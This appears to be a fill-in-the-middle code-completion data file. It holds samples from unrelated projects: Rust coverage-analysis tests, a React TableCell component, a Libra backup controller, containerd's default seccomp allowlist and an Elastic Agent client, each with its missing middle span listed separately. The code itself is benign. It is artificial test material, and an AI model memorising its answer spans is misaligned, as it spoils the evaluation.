assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); let ctx = Context { config: &config, file_contents: "trait Boo { fn print_it(x:u32, y:u32, z:u32) { println!(\"{}:{}:{}\",x,y,z); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); } #[test] fn unreachable_propagate() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "enum Void {} fn empty_match(x: Void) -> u32 { match x { } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); let ctx = Context { config: &config, file_contents: "fn foo() { if random() { loop { match random() { true => match void() {}, false => unreachable!() } } } else { call(); } }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); assert!(lines.ignore.contains(&Lines::Line(6))); assert!(lines.ignore.contains(&Lines::Line(7))); assert!(lines.ignore.contains(&Lines::Line(8))); let ctx = Context { config: &config, file_contents: "fn test_unreachable() { let x: u32 = foo(); if x > 5 { bar(); } unreachable!(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(1))); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); assert!(lines.ignore.contains(&Lines::Line(6))); assert!(lines.ignore.contains(&Lines::Line(7))); } #[test] fn unreachable_include_returns() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn test_not_unreachable() -> Result<(), Box<dyn std::error::Error>> { let x: u32 = foo(); if x > 5 { bar(); return true; } std::fs::remove_dir(\"I don't exist and will definitely fail/so yeahhhh...\")?; unreachable!(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(1))); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(!lines.ignore.contains(&Lines::Line(5))); assert!(!lines.ignore.contains(&Lines::Line(6))); assert!(!lines.ignore.contains(&Lines::Line(7))); assert!(lines.ignore.contains(&Lines::Line(8))); let ctx = Context { config: &config, file_contents: "fn excluded_from_coverage(option: bool) -> bool { if option { return true; } if !option { return false; } unreachable!(); } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(1))); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(!lines.ignore.contains(&Lines::Line(5))); assert!(!lines.ignore.contains(&Lines::Line(6))); assert!(!lines.ignore.contains(&Lines::Line(7))); assert!(lines.ignore.contains(&Lines::Line(8))); } #[test] fn unreachable_include_loops() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn test_not_unreachable() { loop { bar(); } unreachable!(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(1))); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); let ctx = Context { config: &config, file_contents: "fn test_not_unreachable() { while true { bar(); } unreachable!(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(1))); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); let ctx = Context { config: &config, file_contents: "fn test_not_unreachable() -> usize { for i in &[1,2,3,4] { return *i; } unreachable!(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(1))); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); } #[test] fn single_line_callables() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "struct A; impl A { fn foo() {} fn bar(i: i32) {} } fn foo() {} fn bar(i: i32) {} fn blah() { foo(); A::foo(); bar(2); A::bar(2); } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(11))); assert!(!lines.ignore.contains(&Lines::Line(12))); assert!(!lines.ignore.contains(&Lines::Line(13))); assert!(!lines.ignore.contains(&Lines::Line(14))); } #[test] fn visit_generics() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "fn blah<T>(t: T) where T: Clone, T: Eq { println!(\"{:?}\", t.clone()); } pub trait Foo<T> // 9 where T: Clone { fn cloney(&self) -> Self { self.clone() } } impl<T> Foo<T> for T // 18 where T: Clone {} ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(10))); assert!(lines.ignore.contains(&Lines::Line(11))); assert!(lines.ignore.contains(&Lines::Line(19))); assert!(lines.ignore.contains(&Lines::Line(20))); }
tarpaulin_skip_trait_attrs
TableCell.js
import React from 'react'; import PropTypes from 'prop-types'; import classNames from 'classnames'; import withStyles from '../styles/withStyles'; import { capitalize } from '../utils/helpers'; import { darken, fade, lighten } from '../styles/colorManipulator'; export const styles = theme => ({ /* Styles applied to the root element. */ root: { display: 'table-cell', verticalAlign: 'inherit', // Workaround for a rendering bug with spanned columns in Chrome 62.0. // Removes the alpha (sets it to 1), and lightens or darkens the theme color. borderBottom: `1px solid ${ theme.palette.type === 'light' ? lighten(fade(theme.palette.divider, 1), 0.88) : darken(fade(theme.palette.divider, 1), 0.8) }`, textAlign: 'left', padding: '4px 56px 4px 24px', '&:last-child': { paddingRight: 24, }, }, /* Styles applied to the root element if `variant="head"` or `context.table.head`. */ head: { color: theme.palette.text.secondary, fontSize: theme.typography.pxToRem(12), fontWeight: theme.typography.fontWeightMedium, }, /* Styles applied to the root element if `variant="body"` or `context.table.body`. */ body: { color: theme.palette.text.primary, fontSize: theme.typography.pxToRem(13), fontWeight: theme.typography.fontWeightRegular, }, /* Styles applied to the root element if `variant="footer"` or `context.table.footer`. */ footer: { borderBottom: 0, color: theme.palette.text.secondary,
}, /* Styles applied to the root element if `numeric={true}`. */ numeric: { textAlign: 'right', flexDirection: 'row-reverse', // can be dynamically inherited at runtime by contents }, /* Styles applied to the root element if `padding="dense"`. */ paddingDense: { paddingRight: 24, }, /* Styles applied to the root element if `padding="checkbox"`. */ paddingCheckbox: { padding: '0 12px', '&:last-child': { paddingRight: 12, }, }, /* Styles applied to the root element if `padding="none"`. */ paddingNone: { padding: 0, '&:last-child': { padding: 0, }, }, }); function TableCell(props, context) { const { children, classes, className: classNameProp, component, sortDirection, numeric, padding: paddingProp, scope: scopeProp, variant, ...other } = props; const { table, tablelvl2 } = context; let Component; if (component) { Component = component; } else { Component = tablelvl2 && tablelvl2.variant === 'head' ? 'th' : 'td'; } let scope = scopeProp; if (!scope && tablelvl2 && tablelvl2.variant === 'head') { scope = 'col'; } const padding = paddingProp || (table && table.padding ? table.padding : 'default'); const className = classNames( classes.root, { [classes.head]: variant ? variant === 'head' : tablelvl2 && tablelvl2.variant === 'head', [classes.body]: variant ? variant === 'body' : tablelvl2 && tablelvl2.variant === 'body', [classes.footer]: variant ? variant === 'footer' : tablelvl2 && tablelvl2.variant === 'footer', [classes.numeric]: numeric, [classes[`padding${capitalize(padding)}`]]: padding !== 'default', }, classNameProp, ); let ariaSort = null; if (sortDirection) { ariaSort = sortDirection === 'asc' ? 'ascending' : 'descending'; } return ( <Component className={className} aria-sort={ariaSort} scope={scope} {...other}> {children} </Component> ); } TableCell.propTypes = { /** * The table cell contents. */ children: PropTypes.node, /** * Override or extend the styles applied to the component. * See [CSS API](#css-api) below for more details. */ classes: PropTypes.object.isRequired, /** * @ignore */ className: PropTypes.string, /** * The component used for the root node. * Either a string to use a DOM element or a component. */ component: PropTypes.oneOfType([PropTypes.string, PropTypes.func, PropTypes.object]), /** * If `true`, content will align to the right. */ numeric: PropTypes.bool, /** * Sets the padding applied to the cell. * By default, the Table parent component set the value. */ padding: PropTypes.oneOf(['default', 'checkbox', 'dense', 'none']), /** * Set scope attribute. */ scope: PropTypes.string, /** * Set aria-sort direction. */ sortDirection: PropTypes.oneOf(['asc', 'desc', false]), /** * Specify the cell type. * By default, the TableHead, TableBody or TableFooter parent component set the value. */ variant: PropTypes.oneOf(['head', 'body', 'footer']), }; TableCell.defaultProps = { numeric: false, }; TableCell.contextTypes = { table: PropTypes.object, tablelvl2: PropTypes.object, }; export default withStyles(styles, { name: 'MuiTableCell' })(TableCell);
fontSize: theme.typography.pxToRem(12),
backup.rs
// Copyright (c) The Libra Core Contributors // SPDX-License-Identifier: Apache-2.0 use crate::{ backup_types::state_snapshot::manifest::{StateSnapshotBackup, StateSnapshotChunk}, storage::{BackupHandleRef, BackupStorage, FileHandle, ShellSafeName}, utils::{ backup_service_client::BackupServiceClient, read_record_bytes::ReadRecordBytes, should_cut_chunk, GlobalBackupOpt, }, }; use anyhow::{anyhow, Result}; use bytes::Bytes; use libra_crypto::HashValue; use libra_types::{ account_state_blob::AccountStateBlob, ledger_info::LedgerInfoWithSignatures, proof::TransactionInfoWithProof, transaction::Version, }; use once_cell::sync::Lazy; use std::{convert::TryInto, str::FromStr, sync::Arc}; use structopt::StructOpt; use tokio::io::AsyncWriteExt; #[derive(StructOpt)] pub struct StateSnapshotBackupOpt { #[structopt( long = "state-version", help = "Version at which a state snapshot to be taken." )] pub version: Version, } pub struct StateSnapshotBackupController { version: Version, max_chunk_size: usize, client: Arc<BackupServiceClient>, storage: Arc<dyn BackupStorage>, } impl StateSnapshotBackupController { pub fn new( opt: StateSnapshotBackupOpt, global_opt: GlobalBackupOpt, client: Arc<BackupServiceClient>, storage: Arc<dyn BackupStorage>, ) -> Self { Self { version: opt.version, max_chunk_size: global_opt.max_chunk_size, client, storage, } } pub async fn run(self) -> Result<FileHandle> { let backup_handle = self.storage.create_backup(&self.backup_name()).await?; let mut chunks = vec![]; let mut state_snapshot_file = self.client.get_state_snapshot(self.version).await?; let mut prev_record_bytes = state_snapshot_file .read_record_bytes() .await? .ok_or_else(|| anyhow!("State is empty."))?; let mut chunk_bytes = (prev_record_bytes.len() as u32).to_be_bytes().to_vec(); chunk_bytes.extend(&prev_record_bytes); let mut chunk_first_key = Self::parse_key(&prev_record_bytes)?; let mut current_idx: usize = 0; let mut chunk_first_idx: usize = 0; while let Some(record_bytes) = state_snapshot_file.read_record_bytes().await? { if should_cut_chunk(&chunk_bytes, &record_bytes, self.max_chunk_size) { println!("New Chunk."); let chunk = self .write_chunk( &backup_handle, &chunk_bytes, chunk_first_idx, current_idx, chunk_first_key, Self::parse_key(&prev_record_bytes)?, ) .await?; chunks.push(chunk); chunk_bytes = vec![]; chunk_first_idx = current_idx + 1; chunk_first_key = Self::parse_key(&record_bytes)?; } current_idx += 1; chunk_bytes.extend(&(record_bytes.len() as u32).to_be_bytes()); chunk_bytes.extend(&record_bytes); prev_record_bytes = record_bytes; } assert!(!chunk_bytes.is_empty()); println!("Last chunk."); let chunk = self .write_chunk( &backup_handle,
chunk_first_key, Self::parse_key(&prev_record_bytes)?, ) .await?; chunks.push(chunk); self.write_manifest(&backup_handle, chunks).await } } impl StateSnapshotBackupController { fn backup_name(&self) -> ShellSafeName { format!("state_ver_{}", self.version).try_into().unwrap() } fn manifest_name() -> &'static ShellSafeName { static NAME: Lazy<ShellSafeName> = Lazy::new(|| ShellSafeName::from_str("state.manifest").unwrap()); &NAME } fn proof_name() -> &'static ShellSafeName { static NAME: Lazy<ShellSafeName> = Lazy::new(|| ShellSafeName::from_str("state.proof").unwrap()); &NAME } fn chunk_name(first_idx: usize) -> ShellSafeName { format!("{}-.chunk", first_idx).try_into().unwrap() } fn chunk_proof_name(first_idx: usize, last_idx: usize) -> ShellSafeName { format!("{}-{}.proof", first_idx, last_idx) .try_into() .unwrap() } fn parse_key(record: &Bytes) -> Result<HashValue> { let (key, _): (HashValue, AccountStateBlob) = lcs::from_bytes(record)?; Ok(key) } async fn write_chunk( &self, backup_handle: &BackupHandleRef, chunk_bytes: &[u8], first_idx: usize, last_idx: usize, first_key: HashValue, last_key: HashValue, ) -> Result<StateSnapshotChunk> { println!("Asking proof for key: {:?}", last_key); let (chunk_handle, mut chunk_file) = self .storage .create_for_write(backup_handle, &Self::chunk_name(first_idx)) .await?; chunk_file.write_all(&chunk_bytes).await?; let (proof_handle, mut proof_file) = self .storage .create_for_write(backup_handle, &Self::chunk_proof_name(first_idx, last_idx)) .await?; tokio::io::copy( &mut self .client .get_account_range_proof(last_key, self.version) .await?, &mut proof_file, ) .await?; Ok(StateSnapshotChunk { first_idx, last_idx, first_key, last_key, blobs: chunk_handle, proof: proof_handle, }) } async fn write_manifest( &self, backup_handle: &BackupHandleRef, chunks: Vec<StateSnapshotChunk>, ) -> Result<FileHandle> { let proof_bytes = self.client.get_state_root_proof(self.version).await?; let (txn_info, _): (TransactionInfoWithProof, LedgerInfoWithSignatures) = lcs::from_bytes(&proof_bytes)?; let (proof_handle, mut proof_file) = self .storage .create_for_write(&backup_handle, Self::proof_name()) .await?; proof_file.write_all(&proof_bytes).await?; let manifest = StateSnapshotBackup { version: self.version, root_hash: txn_info.transaction_info().state_root_hash(), chunks, proof: proof_handle, }; let (manifest_handle, mut manifest_file) = self .storage .create_for_write(&backup_handle, Self::manifest_name()) .await?; manifest_file .write_all(&serde_json::to_vec(&manifest)?) .await?; Ok(manifest_handle) } }
&chunk_bytes, chunk_first_idx, current_idx,
seccomp_default.go
// +build linux /* Copyright The containerd Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package seccomp import ( "runtime" "golang.org/x/sys/unix" "github.com/opencontainers/runtime-spec/specs-go" ) func arches() []specs.Arch { switch runtime.GOARCH { case "amd64": return []specs.Arch{specs.ArchX86_64, specs.ArchX86, specs.ArchX32} case "arm64": return []specs.Arch{specs.ArchARM, specs.ArchAARCH64} case "mips64": return []specs.Arch{specs.ArchMIPS, specs.ArchMIPS64, specs.ArchMIPS64N32} case "mips64n32": return []specs.Arch{specs.ArchMIPS, specs.ArchMIPS64, specs.ArchMIPS64N32} case "mipsel64": return []specs.Arch{specs.ArchMIPSEL, specs.ArchMIPSEL64, specs.ArchMIPSEL64N32} case "mipsel64n32": return []specs.Arch{specs.ArchMIPSEL, specs.ArchMIPSEL64, specs.ArchMIPSEL64N32} case "s390x": return []specs.Arch{specs.ArchS390, specs.ArchS390X} default: return []specs.Arch{} } } // DefaultProfile defines the allowed syscalls for the default seccomp profile. func DefaultProfile(sp *specs.Spec) *specs.LinuxSeccomp { syscalls := []specs.LinuxSyscall{ { Names: []string{ "accept", "accept4", "access", "adjtimex", "alarm", "bind", "brk", "capget", "capset", "chdir", "chmod", "chown", "chown32", "clock_adjtime", "clock_adjtime64", "clock_getres", "clock_getres_time64", "clock_gettime", "clock_gettime64", "clock_nanosleep", "clock_nanosleep_time64", "close", "close_range", "connect", "copy_file_range", "creat", "dup", "dup2", "dup3", "epoll_create", "epoll_create1", "epoll_ctl", "epoll_ctl_old", "epoll_pwait", "epoll_pwait2", "epoll_wait", "epoll_wait_old", "eventfd", "eventfd2", "execve", "execveat", "exit", "exit_group", "faccessat", "faccessat2", "fadvise64", "fadvise64_64", "fallocate", "fanotify_mark", "fchdir", "fchmod", "fchmodat", "fchown", "fchown32", "fchownat", "fcntl", "fcntl64", "fdatasync", "fgetxattr", "flistxattr", "flock", "fork", "fremovexattr", "fsetxattr", "fstat", "fstat64", "fstatat64", "fstatfs", "fstatfs64", "fsync", "ftruncate", "ftruncate64", "futex", "futex_time64", "futimesat", "getcpu", "getcwd", "getdents", "getdents64", "getegid", "getegid32", "geteuid", "geteuid32", "getgid", "getgid32", "getgroups", "getgroups32", "getitimer", "getpeername", "getpgid", "getpgrp", "getpid", "getppid", "getpriority", "getrandom", "getresgid", "getresgid32", "getresuid", "getresuid32", "getrlimit", "get_robust_list", "getrusage", "getsid", "getsockname", "getsockopt", "get_thread_area", "gettid", "gettimeofday", "getuid", "getuid32", "getxattr", "inotify_add_watch", "inotify_init", "inotify_init1", "inotify_rm_watch", "io_cancel", "ioctl", "io_destroy", "io_getevents", "io_pgetevents", "io_pgetevents_time64", "ioprio_get", "ioprio_set", "io_setup", "io_submit", "io_uring_enter", "io_uring_register", "io_uring_setup", "ipc", "kill", "lchown", "lchown32", "lgetxattr", "link", "linkat", "listen", "listxattr", "llistxattr", "_llseek", "lremovexattr", "lseek", "lsetxattr", "lstat", "lstat64", "madvise", "membarrier", "memfd_create", "mincore", "mkdir", "mkdirat", "mknod", "mknodat", "mlock", "mlock2", "mlockall", "mmap", "mmap2", "mprotect", "mq_getsetattr", "mq_notify", "mq_open", "mq_timedreceive", "mq_timedreceive_time64", "mq_timedsend", "mq_timedsend_time64", "mq_unlink", "mremap", "msgctl", "msgget", "msgrcv", "msgsnd", "msync", "munlock", "munlockall", "munmap", "nanosleep", "newfstatat", "_newselect", "open", "openat", "openat2", "pause", "pidfd_open", "pidfd_send_signal", "pipe", "pipe2", "poll", "ppoll", "ppoll_time64", "prctl", "pread64", "preadv", "preadv2", "prlimit64", "pselect6", "pselect6_time64", "pwrite64", "pwritev", "pwritev2", "read", "readahead", "readlink", "readlinkat", "readv", "recv", "recvfrom", "recvmmsg", "recvmmsg_time64", "recvmsg", "remap_file_pages", "removexattr", "rename", "renameat", "renameat2", "restart_syscall", "rmdir", "rseq", "rt_sigaction", "rt_sigpending", "rt_sigprocmask", "rt_sigqueueinfo", "rt_sigreturn", "rt_sigsuspend", "rt_sigtimedwait", "rt_sigtimedwait_time64", "rt_tgsigqueueinfo", "sched_getaffinity", "sched_getattr", "sched_getparam", "sched_get_priority_max", "sched_get_priority_min", "sched_getscheduler", "sched_rr_get_interval", "sched_rr_get_interval_time64", "sched_setaffinity", "sched_setattr", "sched_setparam", "sched_setscheduler", "sched_yield", "seccomp", "select", "semctl", "semget", "semop", "semtimedop", "semtimedop_time64", "send", "sendfile", "sendfile64", "sendmmsg", "sendmsg", "sendto", "setfsgid", "setfsgid32", "setfsuid", "setfsuid32", "setgid", "setgid32", "setgroups", "setgroups32", "setitimer", "setpgid", "setpriority", "setregid", "setregid32", "setresgid", "setresgid32", "setresuid", "setresuid32", "setreuid", "setreuid32", "setrlimit", "set_robust_list", "setsid", "setsockopt", "set_thread_area", "set_tid_address", "setuid", "setuid32", "setxattr", "shmat", "shmctl", "shmdt", "shmget", "shutdown", "sigaltstack", "signalfd", "signalfd4", "sigprocmask", "sigreturn", "socket", "socketcall", "socketpair", "splice", "stat", "stat64", "statfs", "statfs64", "statx", "symlink", "symlinkat", "sync", "sync_file_range", "syncfs", "sysinfo", "tee", "tgkill", "time", "timer_create", "timer_delete", "timer_getoverrun", "timer_gettime", "timer_gettime64", "timer_settime", "timer_settime64", "timerfd_create", "timerfd_gettime", "timerfd_gettime64", "timerfd_settime", "timerfd_settime64", "times", "tkill", "truncate", "truncate64", "ugetrlimit", "umask", "uname", "unlink", "unlinkat", "utime", "utimensat", "utimensat_time64", "utimes", "vfork", "vmsplice", "wait4",
"waitpid", "write", "writev", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }, { Names: []string{"personality"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 0, Value: 0x0, Op: specs.OpEqualTo, }, }, }, { Names: []string{"personality"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 0, Value: 0x0008, Op: specs.OpEqualTo, }, }, }, { Names: []string{"personality"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 0, Value: 0x20000, Op: specs.OpEqualTo, }, }, }, { Names: []string{"personality"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 0, Value: 0x20008, Op: specs.OpEqualTo, }, }, }, { Names: []string{"personality"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 0, Value: 0xffffffff, Op: specs.OpEqualTo, }, }, }, } s := &specs.LinuxSeccomp{ DefaultAction: specs.ActErrno, Architectures: arches(), Syscalls: syscalls, } // include by arch switch runtime.GOARCH { case "ppc64le": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "sync_file_range2", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "arm", "arm64": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "arm_fadvise64_64", "arm_sync_file_range", "sync_file_range2", "breakpoint", "cacheflush", "set_tls", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "amd64": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "arch_prctl", "modify_ldt", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "386": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "modify_ldt", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "s390", "s390x": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "s390_pci_mmio_read", "s390_pci_mmio_write", "s390_runtime_instr", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) } admin := false for _, c := range sp.Process.Capabilities.Bounding { switch c { case "CAP_DAC_READ_SEARCH": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{"open_by_handle_at"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_ADMIN": admin = true s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "bpf", "clone", "fanotify_init", "fsconfig", "fsmount", "fsopen", "fspick", "lookup_dcookie", "mount", "move_mount", "name_to_handle_at", "open_tree", "perf_event_open", "quotactl", "setdomainname", "sethostname", "setns", "syslog", "umount", "umount2", "unshare", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_BOOT": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{"reboot"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_CHROOT": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{"chroot"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_MODULE": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "delete_module", "init_module", "finit_module", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_PACCT": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{"acct"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_PTRACE": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "kcmp", "pidfd_getfd", "process_madvise", "process_vm_readv", "process_vm_writev", "ptrace", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_RAWIO": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "iopl", "ioperm", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_TIME": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "settimeofday", "stime", "clock_settime", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_TTY_CONFIG": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{"vhangup"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYSLOG": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{"syslog"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) } } if !admin { switch runtime.GOARCH { case "s390", "s390x": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "clone", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 1, Value: unix.CLONE_NEWNS | unix.CLONE_NEWUTS | unix.CLONE_NEWIPC | unix.CLONE_NEWUSER | unix.CLONE_NEWPID | unix.CLONE_NEWNET | unix.CLONE_NEWCGROUP, ValueTwo: 0, Op: specs.OpMaskedEqual, }, }, }) default: s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "clone", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 0, Value: unix.CLONE_NEWNS | unix.CLONE_NEWUTS | unix.CLONE_NEWIPC | unix.CLONE_NEWUSER | unix.CLONE_NEWPID | unix.CLONE_NEWNET | unix.CLONE_NEWCGROUP, ValueTwo: 0, Op: specs.OpMaskedEqual, }, }, }) } } return s }
"waitid",
client.go
// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. package client import ( "context" "encoding/json" "fmt" "sync" "time" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/proto" ) // Status is the status of the Elastic Agent type Status = proto.Status const ( // Starting is when the it is still starting. Starting Status = proto.Status_STARTING // Configuring is when it is configuring. Configuring Status = proto.Status_CONFIGURING // Healthy is when it is healthy. Healthy Status = proto.Status_HEALTHY // Degraded is when it is degraded. Degraded Status = proto.Status_DEGRADED // Failed is when it is failed. Failed Status = proto.Status_FAILED // Stopping is when it is stopping. Stopping Status = proto.Status_STOPPING // Upgrading is when it is upgrading. Upgrading Status = proto.Status_UPGRADING ) // Version is the current running version of the daemon. type Version struct { Version string Commit string BuildTime time.Time Snapshot bool } // ApplicationStatus is a status of an application inside of Elastic Agent. type ApplicationStatus struct { ID string Name string Status Status Message string Payload map[string]interface{} } // ProcMeta is the running version and ID information for a running process. type ProcMeta struct { Process string Name string Hostname string ID string EphemeralID string Version string BuildCommit string BuildTime time.Time Username string UserID string UserGID string BinaryArchitecture string RouteKey string ElasticLicensed bool Error string } // AgentStatus is the current status of the Elastic Agent. type AgentStatus struct { Status Status Message string Applications []*ApplicationStatus } // Client communicates to Elastic Agent through the control protocol. type Client interface { // Connect connects to the running Elastic Agent. Connect(ctx context.Context) error // Disconnect disconnects from the running Elastic Agent. Disconnect() // Version returns the current version of the running agent. Version(ctx context.Context) (Version, error) // Status returns the current status of the running agent. Status(ctx context.Context) (*AgentStatus, error) // Restart triggers restarting the current running daemon. Restart(ctx context.Context) error // Upgrade triggers upgrade of the current running daemon. Upgrade(ctx context.Context, version string, sourceURI string) (string, error) // ProcMeta gathers 